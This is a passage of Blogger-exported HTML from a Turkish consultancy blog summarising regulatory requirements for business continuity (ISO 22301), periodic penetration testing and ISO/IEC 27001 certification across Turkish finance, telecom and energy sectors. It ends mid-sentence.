test gerçekleştirilmesi gibi gereklilikler göz önünde bulundurulduğunda ISO
22301 standardı baz alınarak bir İSYS kurulması ve işletilmesi kuruluşa uyum
açısından büyük avantaj sağlayacaktır. Ek olarak bağımsız ekiplere yılda en az
bir defa sızma testi yaptırılması gerekmektedir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l3 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->4 Aralık 2013 tarihinde Bilgi Alışverişi, Takas
ve Mahsuplaşma Kuruluşlarında Bilgi Sistemleri Yönetiminde Esas Alınacak İlkeler
ile İş Süreçleri ve Bilgi Sistemlerinin Denetimine İlişkin Tebliğ
yayınlanmıştır. Bu tebliğde yer alan her bir servis için kabul edilebilir
kesinti sürelerinin belirlenmesi, ikincil merkez tesis edilmesi, testlerin
yapılması gibi süreçler ISO 22301 standardına uyum süreciyle örtüşmektedir. Bunlara
ek olarak kuruluşların yılda en az bir defa sızma testi yaptırmaları gerektiği
belirtilmiştir. Bu tebliğ Risk Merkezi, bilgi alışverişi, takas ve mahsuplaşma
kuruluşlarını kapsamaktadır. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l3 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->6 Nisan 2019 tarihinde yayınlanan Finansal
Kiralama, Faktoring ve Finansman Şirketlerinin Bilgi Sistemlerinin Yönetimine
ve Denetimine İlişkin Tebliğde “bilgi sistemleri süreklilik planı” başlığında
gereksinimler açıklanmıştır. Her bir servis için kabul edilebilir kesinti sürelerinin
belirlenmesi, ikincil merkez tesis edilip yılda en az bir defa ikincil merkez
üzerinden test yapılması, bilgi sistemleri süreklilik planı hazırlanması gibi
gereklilikler ISO 22301 standardına uyum ile ilişkilendirilebilir. Tebliğde
ayrıca kuruluşların iki yılda bir sızma testi yaptırmaları gerektiği
belirtilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l3 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Ödeme Kuruluşları ve Elektronik Para
Kuruluşlarının Bilgi Sistemlerinin Yönetimine ve Denetimine İlişkin Tebliğ 27
Haziran 2014 tarihinde yayınlanmıştır ve ödeme hizmeti sağlayan ve gerçekleştiren
kuruluşlarla elektronik para ihraç eden kuruluşları kapsamaktadır. Bu tebliğde “bilgi
sistemleri süreklilik planı” başlığı altında bilgi sistemleri süreklilik planı
hazırlanması, ikincil merkez tesis edilmesi ve bu merkez üzerinden testler yapılması,
dış hizmet sağlayıcıyla yapılan sözleşmede dış hizmet sağlayıcının bilgi
sistemleri süreklilik planı kapsamındaki yükümlülükleri hususlarını içermesi gibi
gerekliliklere yer verilmiştir. Bu gereklilikler ISO 22301 standardı ile
ilişkilendirilebilir. Ek olarak kapsamdaki kuruluşların bağımsız ekiplere yılda
en az bir defa sızma testi yaptırmaları gerektiği belirtilmiştir.</div>
<h2>
Bilgi Teknolojileri ve İletişim Kurumu<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l2 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->13 Temmuz 2014 tarihinde yayınlanan Elektronik
Haberleşme Sektöründe Şebeke ve Bilgi Güvenliği Yönetmeliği elektronik
haberleşme hizmeti sunan ve/veya elektronik haberleşme şebekesi sağlayan ve alt
yapısını işleten şirketleri kapsamaktadır. Bu tebliğdeki “iş sürekliliği”
başlığı altında iş sürekliliği planları yapılması, tatbikat ve testlerin
gerçekleştirilmesi gerekliliklerine yer verilmiştir.</div>
<h2>
Enerji Piyasası Düzenleme Kurumu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->13 Temmuz 2017 tarihinde yayınlanan Enerji
Sektöründe Kullanılan Endüstriyel Kontrol Sistemlerinde Bilişim Güvenliği
Yönetmeliğinde bahsedildiği üzere “EKS (Endüstriyel Kontrol Sistemleri)
Güvenlik Kontrolleri” rehberindeki kontrollerin öneri mahiyetinde olduğunda yer
verilmiş, rehberde de bu kontrollerin EKS’lerin güvenliğinin denetlenmesi için
bir el kitabı niteliği taşıdığı bilgisi verilmiştir. Bu rehberde iş
sürekliliğinin sağlanması adına acil durum ve felaketten kurtarma
planlamalarının yapılmasının ve bu planlar yapılırken organizasyonun tabi
olduğu yasa, yönetmelik, standart vb. yükümlülüklerin değerlendirilmesi
gerektiğinden bahsedilmiştir. Aynı zamanda bu rehbere göre bu kuruluşların
belirlenen sıklıkta sızma testi gerçekleştirmeleri gerekmektedir. Bu
yönetmeliğe uymakla yükümlü olan kuruluşlar aşağıda verilmiştir. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Elektrik iletim lisansı sahibi<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->OSB dağıtım lisansı sahipleri hariç olmak üzere
elektrik dağıtım lisansı sahibi<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->OSB üretim lisansı sahibi hariç olmak üzere
geçici kabulü yapılmış ve işletmedeki kurulu gücü 100 MWe ve üzeri lisansa
sahip her bir elektrik üretim tesisi sahibi<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Boru hattı ile iletim yapan doğal gaz iletim
lisansı sahibi <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Sevkiyat kontrol merkezi kurmakla yükümlü doğal
gaz dağıtım lisansı sahibi <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Doğal gaz depolama lisansı sahibi (LNG, yer altı
depolama)<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Ham petrol iletim lisansı sahibi <o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Rafinerici lisansı sahibi</div>
<h2>
Sermaye Piyasası Kurulu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Bilgi Sistemleri Yönetim Tebliği 5 Ocak 2018’de
yayınlanmış olup iş sürekliliği planı hazırlanması, bilgi sistemleri süreklilik
planı hazırlanması ve risk değerlendirme, azaltma ve izleme faaliyetlerini
gerçekleştirmeye dair hususlar içermektedir. Ayrıca kabul edilebilir kesinti
sürelerinin belirlenmesi, ikincil sistem tesis edilmesi gibi gereklilikler de
ISO 22301 standardıyla ilişkilendirilebilir. Bu tebliğ kapsamındaki kuruluşlar
için en az yılda bir kez sızma testine tabi tutulma gerekliliği de
belirtilmiştir. Aşağıda bu tebliğin kapsamındaki kuruluşlar verilmiştir. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Borsa İstanbul A.Ş.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Borsalar ve piyasa işleticileri ile
teşkilatlanmış diğer pazar yerleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Emeklilik yatırım fonları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->İstanbul Takas ve Saklama Bankası A.Ş.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Merkezi Kayıt Kuruluşu A.Ş.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Portföy saklayıcısı kuruluşlar <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Sermaye Piyasası Lisanslama Sicil ve Eğitim
Kuruluşu A.Ş.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Sermaye piyasası kurumları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Halka açık ortaklıklar<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Türkiye Sermaye Piyasaları Birliği<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Türkiye Değerleme Uzmanları Birliği<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Sonuç olarak, kritik faaliyetlerinin farkında olmak,
risklerini yönetmek, iş sürekliliği prosedürleri oluşturup bunları test edip
olası felaket durumlarına karşı hazırlıklı olmak isteyen kuruluşlar iş
sürekliliği yönetim sistemi işletiyor olmalıdır. İş sürekliliği planları
hazırlama ve ikincil merkez tesis etme gibi gerekliliklerin finans ve enerji
sektöründeki önemi gözden kaçırılmamalıdır. Bazı tebliğ ve yönetmeliklerde
doğrudan geçmese bile ISO 22301 standardına uyumlu bir iş sürekliliği yönetim
sisteminin kurulması bahsedilmiş olan gerekliliklerin yerine getirilmesinde
büyük katkılar sağlayacaktır.<o:p></o:p></div>
<br />Sinem Varolhttp://www.blogger.com/profile/16134353775231308294noreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-10482956687475420992020-05-01T18:00:00.000+03:002020-05-22T16:35:01.957+03:00DÜZENLEMELERDE BİLGİ GÜVENLİĞİ VE ISO/IEC 27001 BİLGİ GÜVENLİĞİ YÖNETİM SİSTEMİ SERTİFİKASI GEREKLİLİKLERİ<br />
<div class="MsoNormal" style="text-align: right;">
<b style="background-color: white; color: #222222; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13.2px;">Sinem Varol, Danışman</b></div>
<div class="MsoNormal" style="text-align: justify;">
ISO/IEC 27001 Bilgi Güvenliği
Yönetim Sistemi (BGYS) standardı sertifikasına sahip olmak bir kuruluşun bilgi
güvenliği yönetim sistemini kurduğunun ve işlettiğinin göstergesidir. Bilgi
güvenliği yönetim sistemini işletiyor olmak kuruluşun bu doğrultuda bir
politikası olduğunu, bu sistemde kuruluşta görev sahibi olanların rol ve
sorumluluklarının neler olduğunun belirlendiğini, bilgi güvenliği risk ve
fırsatlarının yönetildiğini ve iç tetkiklerin yapıldığını gösterir. <o:p></o:p></div>
<div class="MsoNormal">
ISO/IEC 27001 bilgi güvenliği yönetim sistemi işletiyor
olmanın kuruluşa farklı açılardan birçok faydası mevcuttur. Bilgi güvenliği
riskleri yönetildiğinde belirsizliğin amaçlar üzerindeki etkileri azaltılabilir
veya ortadan kaldırılabilir, kullanıcıların ağ ve ağ hizmetlerine erişimi
yönetilerek yetkisi olmayan kişilerin bilgiye erişimi kısıtlanabilir ya da ağ
güvenliğinin yönetilmesiyle ve bilgi transfer sürecinde belirli kurallar
uygulanarak kuruluşta haberleşme güvenliği sağlanabilir. Bunlar gibi birçok
fayda kuruluşun fiziksel ve dijital ortamda bulunan tüm çalışan, müşteri ve
ilgili üçüncü taraf bilgilerinin güvenliğini sağlamaya yardımcı olur. <o:p></o:p></div>
<div class="MsoNormal">
ISO/IEC 27001 standardı ilk olarak 2005’te yayınlanmıştır.
Daha sonra 2013 versiyonu ve son olarak da 2017 versiyonu yayınlanmıştır. Bu
standartların Türkçeye çevrilmiş versiyonları TS ISO/IEC 27001:2005, TS ISO/IEC
27001:2013 ve TS ISO/IEC 27001:2017 şeklindedir. Standart ana maddelerinde
bilgi güvenliği yönetim sisteminin kurulması için gerekli olan maddeler
açıklanmıştır. Ayrıca, EK A kontrolleri olarak bilinen, standardın
uygulanmasına yönelik referans kontrol amaçları ve kontroller sayesinde
standarda uyum için yapılması gerekenler kuruluşlar tarafından daha net
anlaşılmakta ve bilgi güvenliği yönetim sisteminin hayata geçirilmesi ve
sürdürülmesi daha kontrollü olarak gerçekleşmektedir. <o:p></o:p></div>
<div class="MsoNormal">
ISO/IEC 27001 standardı sertifikasına kuruluşlar kendi gerek
gördüğü ve sahip olmak istedikleri takdirde sahip olabilir ya da bazı sektörler
ve kuruluşlar için bu sertifikaya sahip olmak zorunlu hale gelmiştir. Bu
yazının devamında, Türkiye’deki kanun, yönetmelik ve tebliğlerde yer aldığı
üzere hangi kuruluşların ISO/IEC 27001 sertifikasına sahip olması gerektiği
incelenmiştir. <o:p></o:p></div>
<h2>
</h2>
<h2>
Bilgi Teknolojileri ve İletişim Kurumu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Elektronik İmza ile İlgili Süreçlere ve Teknik
Kriterlere İlişkin Tebliğde 30 Ocak 2013 tarihinde yapılan değişiklikte elektronik
sertifika hizmet sağlayıcıları için TS ISO/IEC 27001 veya ISO/IEC 27001
standartlarına uyma zorunluluğu getirilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->25 Ağustos 2011 tarihli Kayıtlı Elektronik Posta
Sistemi ile İlgili Süreçlere ve Teknik Kriterlere İlişkin Tebliğde kayıtlı
elektronik posta hizmet sağlayıcıları için TS ISO/IEC 27001 veya ISO/IEC 27001
standartlarına uyma zorunluluğu getirilmiştir. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->15 Ekim 2010 tarihinde yayınlanan Elektronik
Haberleşme Güvenliği Kapsamında TS ISO/IEC 27001 Standardı Uygulamasına İlişkin
Tebliği elektronik haberleşme hizmeti sunan ve/veya elektronik haberleşme
şebekesi sağlayan ve alt yapısını işleten sermaye şirketlerini kapsamaktadır.
Bu şirketlerin TS ISO/IEC 27001 veya ISO/IEC 27001 standardına göre sistem
belgelendirmesi yapmak üzere akredite edilmiş kuruluşlardan alınması gereken
bir uygunluk belgesine sahip olma yükümlülükleri bulunmaktadır. Bu kapsamda TS
ISO/IEC 27001 veya ISO/IEC 27001 standardı uygunluk belgesi aranan
işletmecilerin listesi aşağıda verilmiştir:<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Görev Sözleşmesi İmzalayan İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->İmtiyaz Sözleşmesi İmzalayan İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Uydu Haberleşme Hizmeti Veren İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Altyapı İşletmeciliği Hizmeti Veren İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Sabit Telefon Hizmeti İşletmecileri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->GMPCS Mobil Telefon Hizmeti Veren İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Sanal Mobil Şebeke Hizmeti İşletmecileri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->İnternet Servis Sağlayıcıları<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Hava Taşıtlarında GSM 1800 Mobil Telefon Hizmeti
Veren İşletmeciler<o:p></o:p></div>
<h2>
</h2>
<h2>
Enerji Piyasası Düzenleme Kurumu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l5 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Doğal Gaz Piyasası Lisans Yönetmeliğinde yapılan
26 Aralık 2014 tarihli değişiklikte iletim faaliyetini gerçekleştiren lisans
sahibi tüzel kişiler için çalıştırdığı kurumsal bilişim sistemi ile endüstriyel
kontrol sistemlerini TS ISO/IEC 27001 Bilgi Güvenliği Yönetim Sistemi
standardına uygun bir şekilde işletmekle yükümlü tutulmuştur. Ayrıca, sevkiyat
kontrol merkezi kurmakla yükümlü dağıtım lisans sahipleri için de çalıştırdığı
Kurumsal bilişim sistemi ile endüstriyel kontrol sistemlerini TS ISO/IEC 27001
Bilgi Güvenliği Yönetim Sistemi standardına uygun bir şekilde işletme
zorunluluğu getirilmiştir. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l5 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Elektrik Piyasası Lisans Yönetmeliğinde 26
Aralık 2014 tarihinde bir değişiklik yapılmıştır. Bu yapılan değişiklikle
birlikte, OSB üretim lisansı sahipleri hariç olmak üzere, kurulu gücü 100MW ve
üzerinde olan ve geçici kabulü yapılmış bütün üretim tesisleri için, kurumsal
bilişim sistemi ile endüstriyel kontrol sistemlerini TS ISO/IEC 27001 Bilgi
Güvenliği Yönetim Sistemi standardına uygun bir şekilde işletme yükümlülüğü
getirilmiştir. Aynı yönetmelikte 24 Şubat 2017 tarihinde yapılan değişiklikle
birlikte dağıtım lisans sahipleri için lisans alma tarihinden itibaren yirmi
dört ay içerisinde OSB dağıtım lisansı sahipleri hariç olmak üzere, kurumsal
bilişim sistemi ile endüstriyel kontrol sistemlerini TS ISO/IEC 27001 Bilgi
Güvenliği Yönetim Sistemi standardına uygun bir şekilde işletme yükümlülüğü
getirilmiştir. Aynı yönetmelikte 23 Aralık 2015 tarihinde yapılan değişiklikle
birlikte tedarik lisansı sahipleri için lisans alma tarihinden itibaren yirmi
dört ay içerisinde TS ISO/IEC 27001 standardı için Türk Akreditasyon Kurumuna
akredite olmuş bir belgelendirme kurumu tarafından verilen uygunluk belgelerini
Kuruma sunma yükümlülüğü getirilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l5 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Petrol Piyasası Lisans Yönetmeliğinde 26 Aralık
2014 tarihinde yapılan değişiklikle birlikte rafinerici lisans sahiplerine tesislerin
devreye alınma tarihinden itibaren yirmi dört ay içerisinde kurumsal bilişim
sistemi ile endüstriyel kontrol sistemlerini TS ISO/IEC 27001 Bilgi Güvenliği
Yönetim Sistemi standardına uygun bir şekilde işletme zorunluluğu
getirilmiştir.<o:p></o:p></div>
<h2>
</h2>
<h2>
Gümrük ve Ticaret Bakanlığı<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->21 Mayıs 2014 tarihinde yayınlanan Gümrük
İşlemlerinin Kolaylaştırılması Yönetmeliğinde belirtildiği üzere yetkilendirilmiş
